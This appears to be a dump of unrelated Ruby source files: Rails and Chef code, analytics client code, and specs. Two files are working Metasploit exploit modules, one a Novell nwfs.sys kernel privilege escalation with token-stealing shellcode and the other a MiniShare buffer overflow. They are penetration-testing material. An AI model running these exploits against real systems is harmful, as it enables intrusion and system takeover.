    # whether the Document is available to be worked on, and if it's not
    # use ActiveRecord's error system to indicate its unavailability.
    #if document and document.has_running_jobs?
    #  errors.add(:document, "This document is already being processed") and (return false)
    #
    #  # in future we'll actually lock the document
    #  # Lock the document & contact CloudCrowd to start the job
    #  #document.update :status => UNAVAILABLE
    #end

    begin
      # Note the job id once CloudCrowd has recorded the job.
      @response = RestClient.post(ProcessingJob.endpoint, {:job => CloudCrowdSerializer.new(self).to_json})
      @remote_job = JSON.parse @response.body
      self.cloud_crowd_id = @remote_job['id']
      # We've collected all the info we need, so
      save # it and retain the lock on the document.
    rescue Errno::ECONNREFUSED, RestClient::Exception => error
      LifecycleMailer.exception_notification(error).deliver_now
      # In the event of an error while communicating with CloudCrowd, unlock the document.
      self.update_attributes :complete => true
      #document.update :status => AVAILABLE
      raise error
    end
  end

  # Record the final state of the remote job, mark any failed document import
  # as errored, run the optional callback, and always mark this job complete.
  def resolve(cloud_crowd_job, &blk)
    @remote_job = cloud_crowd_job
    begin
      # Handle Document Jobs
      if self.document
        unless @remote_job['status'] == "succeeded"
          logger.error("Document import failed: " + @remote_job.inspect)
          document.update_attributes(:access => DC::Access::ERROR)
        end
      end
      blk.call(self) if blk
    ensure
      self.update_attributes :complete => true
    end
  end

  # We'll store options as a JSON string, so we need to
  # cast it into a string when options are assigned.
  #
  # WARNING: if you monkey around with the contents of options
  # after it's assigned changes to the options won't be saved.
  def options=(opts)
    @parsed_options = opts
    write_attribute :options, @parsed_options.to_json
  end

  # Memoized parse of the JSON-serialized options column.
  def options
    @parsed_options ||= JSON.parse(read_attribute :options)
  end

  # Return the JSON-ready Job status.
  def status
    (@remote_job || fetch_job).merge(attributes)
  end

  # Fetch the current status of the job from CloudCrowd.
  def fetch_job
    JSON.parse(RestClient.get(url).body)
  end

  # The URL of the Job on CloudCrowd.
  def url
    "#{ProcessingJob.endpoint}/#{cloud_crowd_id}"
  end

  # The default JSON of a processing job is just enough to get it polling for
  # updates again.
  def as_json(opts={})
    { 'id'     => id,
      'title'  => title,
      'status' => 'loading'
    }
  end
end
87d4bc0b982298d38f155d61b78f1bda1e18be1a | 309 | class NeighborhoodServices::VacancyData::Filters::OpenThreeEleven
def initialize(three_eleven_data)
@three_eleven_data = three_eleven_data.dup
end
def filtered_data
@three_eleven_data
.select { |three_eleven_violation|
three_eleven_violation['status'] == 'OPEN'
}
end
end
| 23.769231 | 65 | 0.734628 |
918ce5e531e5f1077c20066cd9930bf3f0ddd05d | 376 | require 'spec_helper'
# Token construction takes (symbol, content, line, column); these specs check
# the type predicates. Uses legacy RSpec `.should` expectation syntax.
describe Scanner::Token do
  it "is the right type of token" do
    @token = Scanner::Token.new(:token_symbol, "content", 0, 0)
    @token.is?(:token_symbol).should be true
  end

  it "is not the wrong type of token" do
    @token = Scanner::Token.new(:token_symbol, "content", 0, 0)
    @token.is_not?(:other_token_symbol).should be true
  end
end
| 22.117647 | 63 | 0.680851 |
1a57d4d2a8b218e58720af187085f4bbcb3b9d0c | 6,069 | require 'thread'
require 'time'
require 'segment_io/analytics/defaults'
require 'segment_io/analytics/logging'
require 'segment_io/analytics/utils'
require 'segment_io/analytics/worker'
module SegmentIO
  class Analytics
    # Buffers analytics messages on an in-memory queue and ships them via a
    # background Worker thread.
    class Client
      include SegmentIO::Analytics::Utils
      include SegmentIO::Analytics::Logging

      # @param [Hash] opts
      # @option opts [String] :write_key Your project's write_key
      # @option opts [FixNum] :max_queue_size Maximum number of calls to be
      #   remain queued.
      # @option opts [Proc] :on_error Handles error calls from the API.
      def initialize(opts = {})
        symbolize_keys!(opts)

        @queue = Queue.new
        @test = opts[:test]
        @write_key = opts[:write_key]
        @max_queue_size = opts[:max_queue_size] || Defaults::Queue::MAX_SIZE
        @worker_mutex = Mutex.new
        @worker = Worker.new(@queue, @write_key, opts)
        @worker_thread = nil

        check_write_key!

        # Signal the worker thread to drain and exit when the process ends.
        at_exit { @worker_thread && @worker_thread[:should_exit] = true }
      end

      # Synchronously waits until the worker has flushed the queue.
      #
      # Use only for scripts which are not long-running, and will specifically
      # exit
      def flush
        # FIX: this condition was corrupted by an email-redaction artifact
        # ("[email protected]…"); restored to the intended "queue not empty or
        # request in flight" check.
        while !@queue.empty? || @worker.is_requesting?
          ensure_worker_running
          sleep(0.1)
        end
      end

      # @!macro common_attrs
      #   @option attrs [String] :anonymous_id ID for a user when you don't know
      #     who they are yet. (optional but you must provide either an
      #     `anonymous_id` or `user_id`)
      #   @option attrs [Hash] :context ({})
      #   @option attrs [Hash] :integrations What integrations this event
      #     goes to (optional)
      #   @option attrs [String] :message_id ID that uniquely
      #     identifies a message across the API. (optional)
      #   @option attrs [Time] :timestamp When the event occurred (optional)
      #   @option attrs [String] :user_id The ID for this user in your database
      #     (optional but you must provide either an `anonymous_id` or `user_id`)
      #   @option attrs [Hash] :options Options such as user traits (optional)

      # Tracks an event
      #
      # @see https://segment.com/docs/sources/server/ruby/#track
      #
      # @param [Hash] attrs
      #
      # @option attrs [String] :event Event name
      # @option attrs [Hash] :properties Event properties (optional)
      # @macro common_attrs
      def track(attrs)
        symbolize_keys! attrs
        enqueue(FieldParser.parse_for_track(attrs))
      end

      # Identifies a user
      #
      # @see https://segment.com/docs/sources/server/ruby/#identify
      #
      # @param [Hash] attrs
      #
      # @option attrs [Hash] :traits User traits (optional)
      # @macro common_attrs
      def identify(attrs)
        symbolize_keys! attrs
        enqueue(FieldParser.parse_for_identify(attrs))
      end

      # Aliases a user from one id to another
      #
      # @see https://segment.com/docs/sources/server/ruby/#alias
      #
      # @param [Hash] attrs
      #
      # @option attrs [String] :previous_id The ID to alias from
      # @macro common_attrs
      def alias(attrs)
        symbolize_keys! attrs
        enqueue(FieldParser.parse_for_alias(attrs))
      end

      # Associates a user identity with a group.
      #
      # @see https://segment.com/docs/sources/server/ruby/#group
      #
      # @param [Hash] attrs
      #
      # @option attrs [String] :group_id The ID of the group
      # @option attrs [Hash] :traits User traits (optional)
      # @macro common_attrs
      def group(attrs)
        symbolize_keys! attrs
        enqueue(FieldParser.parse_for_group(attrs))
      end

      # Records a page view
      #
      # @see https://segment.com/docs/sources/server/ruby/#page
      #
      # @param [Hash] attrs
      #
      # @option attrs [String] :name Name of the page
      # @option attrs [Hash] :properties Page properties (optional)
      # @macro common_attrs
      def page(attrs)
        symbolize_keys! attrs
        enqueue(FieldParser.parse_for_page(attrs))
      end

      # Records a screen view (for a mobile app)
      #
      # @param [Hash] attrs
      #
      # @option attrs [String] :name Name of the screen
      # @option attrs [Hash] :properties Screen properties (optional)
      # @option attrs [String] :category The screen category (optional)
      # @macro common_attrs
      def screen(attrs)
        symbolize_keys! attrs
        enqueue(FieldParser.parse_for_screen(attrs))
      end

      # @return [Fixnum] number of messages in the queue
      def queued_messages
        @queue.length
      end

      # Mirror queue that records every enqueued action when the client was
      # constructed with :test => true.
      def test_queue
        unless @test
          raise 'Test queue only available when setting :test to true.'
        end

        @test_queue ||= TestQueue.new
      end

      private

      # private: Enqueues the action.
      #
      # returns Boolean of whether the item was added to the queue.
      def enqueue(action)
        # add our request id for tracing purposes
        action[:messageId] ||= uid

        test_queue << action if @test

        if @queue.length < @max_queue_size
          @queue << action
          ensure_worker_running

          true
        else
          # Drop the message rather than block the caller on a full queue.
          logger.warn(
            'Queue is full, dropping events. The :max_queue_size ' \
            'configuration parameter can be increased to prevent this from ' \
            'happening.'
          )
          false
        end
      end

      # private: Checks that the write_key is properly initialized
      def check_write_key!
        raise ArgumentError, 'Write key must be initialized' if @write_key.nil?
      end

      # Lazily (re)starts the background worker thread; double-checked under
      # the mutex so only one thread is ever spawned at a time.
      def ensure_worker_running
        return if worker_running?
        @worker_mutex.synchronize do
          return if worker_running?
          @worker_thread = Thread.new do
            @worker.run
          end
        end
      end

      def worker_running?
        @worker_thread && @worker_thread.alive?
      end
    end
  end
end
| 30.044554 | 81 | 0.610479 |
e974172e83acbab6a07bbfa4fbde6a1d92bfee9c | 309 | module ActiveBookings
module Serializer
class << self
def load(string)
if string.present?
IceCube::Schedule.from_yaml(string)
end
end
def dump(object)
if object.is_a? IceCube::Schedule
object.to_yaml
end
end
end
end
end
| 17.166667 | 45 | 0.572816 |
797bed610225c116b9851034c68c7dda305dfe84 | 557 |
#package "epel-release"
# Shut down the iptables service so the firewall does not interfere.
execute 'centos_disable_iptables' do
  command 'service iptables stop'
  cwd '/tmp'
end
#bash "centos_alias_php" do
# user "root"
# cwd "/tmp"
# code <<-EOT
# echo "alias php='/usr/local/bin/php'" >> /root/.bashrc
# EOT
# not_if "grep /root/.bashrc /usr/local/bin/php"
#end
#bash "centos_alias_php-config" do
# user "root"
# cwd "/tmp"
# code <<-EOT
# echo "alias php-config='/usr/local/bin/php-config'" >> /root/.bashrc
# EOT
# not_if "grep /root/.bashrc /usr/local/bin/php"
#end
| 20.62963 | 76 | 0.612208 |
ac5f8f54076a51ff0f5c987cf413f259fba746bd | 13,528 | ##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
class Metasploit3 < Msf::Exploit::Local
Rank = AverageRanking
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process
def initialize(info={})
super(update_info(info, {
'Name' => 'Novell Client 4.91 SP4 nwfs.sys Local Privilege Escalation',
'Description' => %q{
This module exploits a flaw in the nwfs.sys driver to overwrite data in kernel
space. The corruption occurs while handling ioctl requests with code 0x1438BB,
where a 0x00000009 dword is written to an arbitrary address. An entry within the
HalDispatchTable is overwritten in order to execute arbitrary code when
NtQueryIntervalProfile is called. The module has been tested successfully on
Windows XP SP3 with Novell Client 4.91 SP4.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Ruben Santamarta', # Vulnerability discovery and PoC
'juan vazquez' # MSF module
],
'Arch' => ARCH_X86,
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Targets' =>
[
# Tested with nwfs.sys 4.91.4.7 as installed with Novell Client 4.91 SP4
[ 'Automatic', { } ],
[ 'Windows XP SP3',
{
'HaliQuerySystemInfo' => 0x16bba, # Stable over Windows XP SP3 updates
'_KPROCESS' => "\x44", # Offset to _KPROCESS from a _ETHREAD struct
'_TOKEN' => "\xc8", # Offset to TOKEN from the _EPROCESS struct
'_UPID' => "\x84", # Offset to UniqueProcessId FROM the _EPROCESS struct
'_APLINKS' => "\x88" # Offset to ActiveProcessLinks _EPROCESS struct
}
]
],
'References' =>
[
[ 'OSVDB', '46578' ],
[ 'BID', '30001' ],
[ 'URL', 'http://support.novell.com/docs/Readmes/InfoDocument/patchbuilder/readme_5028543.html' ]
],
'DisclosureDate'=> 'Jun 26 2008',
'DefaultTarget' => 0
}))
end
def add_railgun_functions
session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi')
session.railgun.add_function(
'psapi',
'EnumDeviceDrivers',
'BOOL',
[
["PBLOB", "lpImageBase", "out"],
["DWORD", "cb", "in"],
["PDWORD", "lpcbNeeded", "out"]
])
session.railgun.add_function(
'psapi',
'GetDeviceDriverBaseNameA',
'DWORD',
[
["LPVOID", "ImageBase", "in"],
["PBLOB", "lpBaseName", "out"],
["DWORD", "nSize", "in"]
])
end
def open_device(dev)
invalid_handle_value = 0xFFFFFFFF
r = session.railgun.kernel32.CreateFileA(dev, "GENERIC_READ", 0x3, nil, "OPEN_EXISTING", "FILE_ATTRIBUTE_READONLY", 0)
handle = r['return']
if handle == invalid_handle_value
return nil
end
return handle
end
def find_sys_base(drvname)
results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack("L*")
addresses.each do |address|
results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
current_drvname = results['lpBaseName'][0..results['return'] - 1]
if drvname == nil
if current_drvname.downcase.include?('krnl')
return [address, current_drvname]
end
elsif drvname == results['lpBaseName'][0..results['return'] - 1]
return [address, current_drvname]
end
end
return nil
end
def ring0_shellcode(t)
restore_ptrs = "\x31\xc0" # xor eax, eax
restore_ptrs << "\xb8" + [ @addresses["HaliQuerySystemInfo"] ].pack("L") # mov eax, offset hal!HaliQuerySystemInformation
restore_ptrs << "\xa3" + [ @addresses["halDispatchTable"] + 4 ].pack("L") # mov dword ptr [nt!HalDispatchTable+0x4], eax
tokenstealing = "\x52" # push edx # Save edx on the stack
tokenstealing << "\x53" # push ebx # Save ebx on the stack
tokenstealing << "\x33\xc0" # xor eax, eax # eax = 0
tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00" # mov eax, dword ptr fs:[eax+124h] # Retrieve ETHREAD
tokenstealing << "\x8b\x40" + t['_KPROCESS'] # mov eax, dword ptr [eax+44h] # Retrieve _KPROCESS
tokenstealing << "\x8b\xc8" # mov ecx, eax
tokenstealing << "\x8b\x98" + t['_TOKEN'] + "\x00\x00\x00" # mov ebx, dword ptr [eax+0C8h] # Retrieves TOKEN
tokenstealing << "\x8b\x80" + t['_APLINKS'] + "\x00\x00\x00" # mov eax, dword ptr [eax+88h] <====| # Retrieve FLINK from ActiveProcessLinks
tokenstealing << "\x81\xe8" + t['_APLINKS'] + "\x00\x00\x00" # sub eax,88h | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks
tokenstealing << "\x81\xb8" + t['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00" # cmp dword ptr [eax+84h], 4 | # Compares UniqueProcessId with 4 (The System Process on Windows XP)
tokenstealing << "\x75\xe8" # jne 0000101e ======================
tokenstealing << "\x8b\x90" + t['_TOKEN'] + "\x00\x00\x00" # mov edx,dword ptr [eax+0C8h] # Retrieves TOKEN and stores on EDX
tokenstealing << "\x8b\xc1" # mov eax, ecx # Retrieves KPROCESS stored on ECX
tokenstealing << "\x89\x90" + t['_TOKEN'] + "\x00\x00\x00" # mov dword ptr [eax+0C8h],edx # Overwrites the TOKEN for the current KPROCESS
tokenstealing << "\x5b" # pop ebx # Restores ebx
tokenstealing << "\x5a" # pop edx # Restores edx
tokenstealing << "\xc2\x10" # ret 10h # Away from the kernel!
ring0_shellcode = restore_ptrs + tokenstealing
return ring0_shellcode
end
def fill_memory(proc, address, length, content)
result = session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack("L"), nil, [ length ].pack("L"), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")
if not proc.memory.writable?(address)
vprint_error("Failed to allocate memory")
return nil
else
vprint_good("#{address} is now writable")
end
result = proc.memory.write(address, content)
if result.nil?
vprint_error("Failed to write contents to memory")
return nil
else
vprint_good("Contents successfully written to 0x#{address.to_s(16)}")
end
return address
end
def disclose_addresses(t)
addresses = {}
vprint_status("Getting the Kernel module name...")
kernel_info = find_sys_base(nil)
if kernel_info.nil?
vprint_error("Failed to disclose the Kernel module name")
return nil
end
vprint_good("Kernel module found: #{kernel_info[1]}")
vprint_status("Getting a Kernel handle...")
kernel32_handle = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)
kernel32_handle = kernel32_handle['return']
if kernel32_handle == 0
vprint_error("Failed to get a Kernel handle")
return nil
end
vprint_good("Kernel handle acquired")
vprint_status("Disclosing the HalDispatchTable...")
hal_dispatch_table = session.railgun.kernel32.GetProcAddress(kernel32_handle, "HalDispatchTable")
hal_dispatch_table = hal_dispatch_table['return']
if hal_dispatch_table == 0
vprint_error("Failed to disclose the HalDispatchTable")
return nil
end
hal_dispatch_table -= kernel32_handle
hal_dispatch_table += kernel_info[0]
addresses["halDispatchTable"] = hal_dispatch_table
vprint_good("HalDispatchTable found at 0x#{addresses["halDispatchTable"].to_s(16)}")
vprint_status("Getting the hal.dll Base Address...")
hal_info = find_sys_base("hal.dll")
if hal_info.nil?
vprint_error("Failed to disclose hal.dll Base Address")
return nil
end
hal_base = hal_info[0]
vprint_good("hal.dll Base Address disclosed at 0x#{hal_base.to_s(16)}")
hali_query_system_information = hal_base + t['HaliQuerySystemInfo']
addresses["HaliQuerySystemInfo"] = hali_query_system_information
vprint_good("HaliQuerySystemInfo Address disclosed at 0x#{addresses["HaliQuerySystemInfo"].to_s(16)}")
return addresses
end
def exploit
vprint_status("Adding the railgun stuff...")
add_railgun_functions
if sysinfo["Architecture"] =~ /wow64/i
fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
elsif sysinfo["Architecture"] =~ /x64/
fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
end
my_target = nil
if target.name =~ /Automatic/
print_status("Detecting the target system...")
os = sysinfo["OS"]
print_status("#{os.inspect}")
if os =~ /windows xp/i
my_target = targets[1]
print_status("Running against #{my_target.name}")
end
else
my_target = target
end
if my_target.nil?
fail_with(Failure::NoTarget, "Remote system not detected as target, select the target manually")
end
print_status("Checking device...")
handle = open_device("\\\\.\\nwfs")
if handle.nil?
fail_with(Failure::NoTarget, "\\\\.\\nwfs device not found")
else
print_good("\\\\.\\nwfs found!")
end
print_status("Disclosing the HalDispatchTable and hal!HaliQuerySystemInfo addresses...")
@addresses = disclose_addresses(my_target)
if @addresses.nil?
session.railgun.kernel32.CloseHandle(handle)
fail_with(Failure::Unknown, "Filed to disclose necessary addresses for exploitation. Aborting.")
else
print_good("Addresses successfully disclosed.")
end
print_status("Storing the kernel stager on memory...")
this_proc = session.sys.process.open
kernel_shell = ring0_shellcode(my_target)
kernel_shell_address = 0x1000
result = fill_memory(this_proc, kernel_shell_address, 0x1000, kernel_shell)
if result.nil?
session.railgun.kernel32.CloseHandle(handle)
fail_with(Failure::Unknown, "Error while storing the kernel stager shellcode on memory")
else
print_good("Kernel stager successfully stored at 0x#{kernel_shell_address.to_s(16)}")
end
print_status("Storing the trampoline to the kernel stager on memory...")
trampoline = "\x90" * 0x20 # nops
trampoline << "\x68" # push opcode
trampoline << [0x1000].pack("V") # address to push
trampoline << "\xc3" # ret
trampoline_addr = 0x3
result = fill_memory(this_proc, trampoline_addr, 0x1000, trampoline)
if result.nil?
session.railgun.kernel32.CloseHandle(handle)
fail_with(Failure::Unknown, "Error while storing trampoline on memory")
else
print_good("Trampoline successfully stored at 0x#{trampoline_addr.to_s(16)}")
end
print_status("Triggering the vulnerability, corrupting the HalDispatchTable...")
magic_ioctl = 0x1438BB
ioctl = session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, magic_ioctl, @addresses["halDispatchTable"] + 0x4, 0x10, 0, 0)
session.railgun.kernel32.CloseHandle(handle)
print_status("Executing the Kernel Stager throw NtQueryIntervalProfile()...")
result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)
print_status("Checking privileges after exploitation...")
if not is_system?
fail_with(Failure::Unknown, "The exploitation wasn't successful")
else
print_good("Exploitation successful!")
end
p = payload.encoded
print_status("Injecting #{p.length.to_s} bytes to memory and executing it...")
if execute_shellcode(p)
print_good("Enjoy")
else
fail_with(Failure::Unknown, "Error while executing the payload")
end
end
end
=begin
[*] Corruption
.text:0005512E sub_5512E proc near ; CODE XREF: ioctl_handler_sub_2FE4C+295p
.text:0005512E ; sub_405C4+29Bp
.text:0005512E
.text:0005512E ms_exc = CPPEH_RECORD ptr -18h
.text:0005512E arg_0 = dword ptr 8
.text:0005512E
.text:0005512E push 8
.text:00055130 push offset stru_79268
.text:00055135 call __SEH_prolog
.text:0005513A xor eax, eax
.text:0005513C mov ecx, [ebp+arg_0]
.text:0005513F mov ecx, [ecx+0Ch]
.text:00055142 mov ecx, [ecx+60h]
.text:00055145 mov ecx, [ecx+10h]
.text:00055148 mov [ebp+ms_exc.registration.TryLevel], eax
.text:0005514B mov dword ptr [ecx], 9 // Corruption
=end
| 39.440233 | 185 | 0.606446 |
e24fd5568b5bef11ea0137cb6614ad360e41ce3b | 701 | require 'rails_helper'
# Capybara feature coverage for the sign-in flow.
RSpec.feature 'Users can sign in' do
  # let! forces creation before each scenario so the credentials exist.
  let!(:user) { FactoryGirl.create(:user) }
  # Happy path: factory password is 'password'.
  scenario 'with valid credentials' do
    visit '/'
    click_link 'Sign in'
    fill_in 'Email', with: user.email
    fill_in 'Password', with: 'password'
    click_button 'Sign in'
    expect(page).to have_content 'Signed in successfully.'
    expect(page).to have_content "Signed in as #{user.email}"
  end
  # Archived accounts must be rejected even with correct credentials.
  scenario 'unless they are archived' do
    user.archive
    visit '/'
    click_link 'Sign in'
    fill_in 'Email', with: user.email
    fill_in 'Password', with: 'password'
    click_button 'Sign in'
    expect(page).to have_content 'Your account has been archived.'
  end
end
| 24.172414 | 66 | 0.677603 |
d51fe958ac7abf0ea4c1efd7b243869b50e240c7 | 1,965 | Dummy::Application.routes.draw do
ActiveAdmin.routes(self)
devise_for :admin_users, ActiveAdmin::Devise.config
Ecm::Courses::Routing.routes(self)
root :to => "ecm::courses::course_categories#index"
# The priority is based upon order of creation:
# first created -> highest priority.
# Sample of regular route:
# match 'products/:id' => 'catalog#view'
# Keep in mind you can assign values other than :controller and :action
# Sample of named route:
# match 'products/:id/purchase' => 'catalog#purchase', :as => :purchase
# This route can be invoked with purchase_url(:id => product.id)
# Sample resource route (maps HTTP verbs to controller actions automatically):
# resources :products
# Sample resource route with options:
# resources :products do
# member do
# get 'short'
# post 'toggle'
# end
#
# collection do
# get 'sold'
# end
# end
# Sample resource route with sub-resources:
# resources :products do
# resources :comments, :sales
# resource :seller
# end
# Sample resource route with more complex sub-resources
# resources :products do
# resources :comments
# resources :sales do
# get 'recent', :on => :collection
# end
# end
# Sample resource route within a namespace:
# namespace :admin do
# # Directs /admin/products/* to Admin::ProductsController
# # (app/controllers/admin/products_controller.rb)
# resources :products
# end
# You can have the root of your site routed with "root"
# just remember to delete public/index.html.
# root :to => 'welcome#index'
# See how all your routes lay out with "rake routes"
# This is a legacy wild controller route that's not recommended for RESTful applications.
# Note: This route will make all actions in every controller accessible via GET requests.
# match ':controller(/:action(/:id))(.:format)'
end
| 29.772727 | 91 | 0.664631 |
4a7b24647be4daac1bff6465b2dabeef379bd70c | 3,049 | # Copyright 2011, Dell
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Locate the admin/provisioner node; its attributes describe the package
# repositories every other node should use.
provisioners = search(:node, "roles:provisioner-server")
provisioner = provisioners[0] if provisioners

# e.g. "ubuntu-12.04" / "centos-6.4" — key into the repositories attribute.
os_token="#{node[:platform]}-#{node[:platform_version]}"
Chef::Log.info("Running on #{os_token}")

# Marker file used as a notification target: repo templates create it, the
# cache-refresh resources fire only while it exists and then delete it.
file "/tmp/.repo_update" do
  action :nothing
end

# Skip repo setup inside the Sledgehammer discovery image.
if provisioner and !CrowbarHelper.in_sledgehammer?(node)
  web_port = provisioner["provisioner"]["web_port"]
  address = Chef::Recipe::Barclamp::Inventory.get_network_by_type(provisioner, "admin").address
  case node["platform"]
  when "ubuntu","debian"
    repositories = provisioner["provisioner"]["repositories"][os_token]
    # Allow unauthenticated packages from the local crowbar mirrors.
    cookbook_file "/etc/apt/apt.conf.d/99-crowbar-no-auth" do
      source "apt.conf"
    end
    # Replace the distro sources entirely with crowbar-managed lists.
    file "/etc/apt/sources.list" do
      action :delete
    end
    repositories.each do |repo,urls|
      case repo
      when "base"
        template "/etc/apt/sources.list.d/00-base.list" do
          variables(:urls => urls)
          notifies :create, "file[/tmp/.repo_update]", :immediately
        end
      else
        template "/etc/apt/sources.list.d/10-barclamp-#{repo}.list" do
          source "10-crowbar-extra.list.erb"
          variables(:urls => urls)
          notifies :create, "file[/tmp/.repo_update]", :immediately
        end
      end
    end
    # Refresh the apt cache only when some repo list actually changed.
    bash "update software sources" do
      code "apt-get update"
      notifies :delete, "file[/tmp/.repo_update]", :immediately
      only_if { ::File.exists? "/tmp/.repo_update" }
    end
    package "rubygems"
  when "redhat","centos"
    maj,min = node[:platform_version].split('.',2)
    # Walk minor versions downward until a matching repo set is found
    # (rescue nil swallows lookup misses on absent keys).
    repositories = Range.new(0,min.to_i).to_a.reverse.map{|v|
      provisioner["provisioner"]["repositories"]["#{node[:platform]}-#{maj}.#{v}"] rescue nil
    }.compact.first
    # NOTE(review): this resource shares its name and code with the one
    # below; Chef treats duplicate resource names as clones — confirm the
    # :nothing variant is intentional.
    bash "update software sources" do
      code "yum clean expire-cache"
      action :nothing
    end
    repositories.each do |repo,urls|
      template "/etc/yum.repos.d/crowbar-#{repo}.repo" do
        source "crowbar-xtras.repo.erb"
        variables(:repo => repo, :urls => urls)
        notifies :create, "file[/tmp/.repo_update]", :immediately
      end
    end
    # Expire the yum cache only when some repo file changed.
    bash "update software sources" do
      code "yum clean expire-cache"
      notifies :delete, "file[/tmp/.repo_update]", :immediately
      only_if { ::File.exists? "/tmp/.repo_update" }
    end
  end
  # Point rubygems at the provisioner's gem mirror (not on suse/windows).
  if node["platform"] != "suse" and node["platform"] != "windows"
    template "/etc/gemrc" do
      variables(:admin_ip => address, :web_port => web_port)
      mode "0644"
    end
  end
end
| 34.258427 | 95 | 0.663824 |
d5ea62fe86b8402e2487fb512ff7222b357c1aa8 | 337 | # Force shared connections between threads - really, really import to keeping
# the database clean
class ActiveRecord::Base
  # Single connection shared by every thread (test-suite helper).
  mattr_accessor :shared_connection
  @@shared_connection = nil
  # Hand out the shared connection when set; otherwise fall back to the
  # normal per-thread connection checkout.
  def self.connection
    @@shared_connection || retrieve_connection
  end
end
# Capture the current connection so all threads reuse it from now on.
ActiveRecord::Base.shared_connection = ActiveRecord::Base.connection
| 28.083333 | 77 | 0.79822 |
ffdcf97b1dc6ba8b1afb6eeda6cc6ea97663603b | 3,006 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
# Remote stack buffer overflow in the MiniShare web server (<= 1.4.1):
# an overlong request URI overwrites the saved return address.
class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Minishare 1.4.1 Buffer Overflow',
      'Description' => %q{
        This is a simple buffer overflow for the minishare web
        server. This flaw affects all versions prior to 1.4.2. This
        is a plain stack buffer overflow that requires a "jmp esp" to reach
        the payload, making this difficult to target many platforms
        at once. This module has been successfully tested against
        1.4.1. Version 1.3.4 and below do not seem to be vulnerable.
      },
      'Author'      => [ 'acaro <acaro[at]jervus.it>' ],
      'License'     => BSD_LICENSE,
      'References'  =>
        [
          [ 'CVE', '2004-2271'],
          [ 'OSVDB', '11530'],
          [ 'BID', '11620'],
          [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2004-11/0208.html'],
        ],
      'Privileged'  => false,
      'Payload'     =>
        {
          'Space'           => 1024,
          'BadChars'        => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x40",
          'MinNops'         => 64,
          'StackAdjustment' => -3500,
        },
      'Platform'    => 'win',
      # Each target: 'Rets' => [ offset to the saved return address,
      # address of a "jmp esp" / "push esp; ret" gadget for that OS build ].
      'Targets'     =>
        [
          ['Windows 2000 SP0-SP3 English', { 'Rets' => [ 1787, 0x7754a3ab ]}], # jmp esp
          ['Windows 2000 SP4 English', { 'Rets' => [ 1787, 0x7517f163 ]}], # jmp esp
          ['Windows XP SP0-SP1 English', { 'Rets' => [ 1787, 0x71ab1d54 ]}], # push esp, ret
          ['Windows XP SP2 English', { 'Rets' => [ 1787, 0x71ab9372 ]}], # push esp, ret
          ['Windows 2003 SP0 English', { 'Rets' => [ 1787, 0x71c03c4d ]}], # push esp, ret
          ['Windows 2003 SP1 English', { 'Rets' => [ 1787, 0x77403680 ]}], # jmp esp
          ['Windows 2003 SP2 English', { 'Rets' => [ 1787, 0x77402680 ]}], # jmp esp
          ['Windows NT 4.0 SP6', { 'Rets' => [ 1787, 0x77f329f8 ]}], # jmp esp
          ['Windows XP SP2 German', { 'Rets' => [ 1787, 0x77d5af0a ]}], # jmp esp
          ['Windows XP SP2 Polish', { 'Rets' => [ 1787, 0x77d4e26e ]}], # jmp esp
          ['Windows XP SP2 French', { 'Rets' => [ 1787, 0x77d5af0a ]}], # jmp esp
          ['Windows XP SP3 French', { 'Rets' => [ 1787, 0x7e3a9353 ]}], # jmp esp
        ],
      'DefaultOptions' =>
        {
          'WfsDelay' => 30
        },
      'DisclosureDate' => 'Nov 7 2004'))
  end

  # Sends one raw GET whose URI is: filler up to the return address, the
  # gadget address, then the encoded payload.
  def exploit
    print_status("Trying target address 0x%.8x..." % target['Rets'][1])

    request_uri = rand_text_alphanumeric(target['Rets'][0])
    request_uri << [target['Rets'][1]].pack('V')
    request_uri << payload.encoded

    send_request_raw({ 'uri' => request_uri }, 5)
    handler
  end
end
| 38.538462 | 94 | 0.52994 |
28054e3a1d9cd8287f1ea5b1af5220d549188ed6 | 880 | # coding: utf-8
# coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'java-properties/version'

Gem::Specification.new do |spec|
  spec.name        = "java-properties"
  spec.version     = JavaProperties::VERSION.dup
  spec.authors     = ["Jonas Thiel"]
  spec.email       = ["[email protected]"]
  spec.summary     = %q{Loader and writer for *.properties files}
  spec.description = %q{Tool for loading and writing Java properties files}
  spec.homepage    = "https://github.com/jnbt/java-properties"
  spec.license     = "MIT"

  spec.files       = %w(LICENSE README.md Rakefile java-properties.gemspec)
